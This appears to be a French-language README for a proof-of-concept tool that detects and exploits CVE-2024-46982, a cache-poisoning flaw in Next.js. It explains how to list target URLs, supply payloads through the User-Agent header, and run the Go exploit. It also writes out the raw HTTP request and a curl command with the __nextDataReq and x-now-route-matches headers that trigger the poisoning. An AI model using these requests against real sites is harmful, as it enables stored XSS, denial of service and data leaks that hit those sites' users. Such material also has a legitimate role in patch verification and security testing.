
POC CVE-2024-46982
Cet outil automatise la détection et l'exploitation de CVE-2024-46982, une vulnérabilité d'empoisonnement du cache dans Next.js, où les réponses de rendu côté serveur (SSR) peuvent être incorrectement mises en cache comme génération de site statique (SSG). Cette mauvaise configuration peut entraîner des XSS stockées, des DoS et des fuites de données, permettant aux attaquants d'injecter du contenu malveillant dans les réponses mises en cache.
Créez un fichier nommé targets.txt contenant une URL cible par ligne :
https://vulnerable-site.com
https://another-target.com
Créez un fichier nommé payloads.txt contenant des payloads qui seront injectés via l'en-tête User-Agent :
Compilez et exécutez l'exploit avec :
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
Envoyez une requête malveillante avec curl :
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
Visitez le point de terminaison dans un navigateur